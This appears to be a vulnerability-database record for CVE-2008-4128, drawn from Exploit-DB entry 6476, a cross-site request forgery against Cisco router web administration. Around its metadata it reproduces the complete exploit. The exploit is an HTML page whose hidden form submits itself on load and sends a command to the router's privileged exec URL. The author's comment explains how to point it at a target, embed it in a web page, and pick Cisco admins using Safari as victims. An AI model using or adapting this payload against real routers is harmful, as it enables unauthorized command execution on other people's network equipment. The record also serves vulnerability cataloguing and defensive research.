ID

VAR-E-200809-0317


CVE

cve_id:CVE-2008-4128

Trust: 1.0

sources: EXPLOIT-DB: 6476

EDB ID

6476


TITLE

Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1) - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 6476

DESCRIPTION

Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1). CVE-2008-4128 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 6476

AFFECTED PRODUCTS

vendor:ciscomodel:routerscope: - version: -

Trust: 1.0

sources: EXPLOIT-DB: 6476

EXPLOIT

<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #1
Replace "10.10.10.1" with the IP address of the target router, embed this in a web
page and hope for the best. Cisco Admin's + Safari are the best targets ;) -->

<html>
<body>

<body onload="asdf.submit();">

<form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-">

<input type=hidden name=command value="show privilege">

<input type=hidden name=command_url value="/level/15/exec/-">

</body>
</html>

# milw0rm.com [2008-09-17]

Trust: 1.0

sources: EXPLOIT-DB: 6476

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 6476

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 6476

TYPE

HTTP Administration Cross-Site Request Forgery / Command Execution (1)

Trust: 1.0

sources: EXPLOIT-DB: 6476

CREDITS

Jeremy Brown

Trust: 0.6

sources: EXPLOIT-DB: 6476

EXTERNAL IDS

db:EXPLOIT-DBid:6476

Trust: 1.6

db:NVDid:CVE-2008-4128

Trust: 1.0

db:EDBNETid:30707

Trust: 0.6

sources: EXPLOIT-DB: 6476 // EDBNET: 30707

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2008-4128

Trust: 1.0

url:https://www.exploit-db.com/exploits/6476/

Trust: 0.6

sources: EXPLOIT-DB: 6476 // EDBNET: 30707

SOURCES

db:EXPLOIT-DBid:6476
db:EDBNETid:30707

LAST UPDATE DATE

2022-07-27T09:20:04.028000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:6476date:2008-09-17T00:00:00
db:EDBNETid:30707date:2008-09-17T00:00:00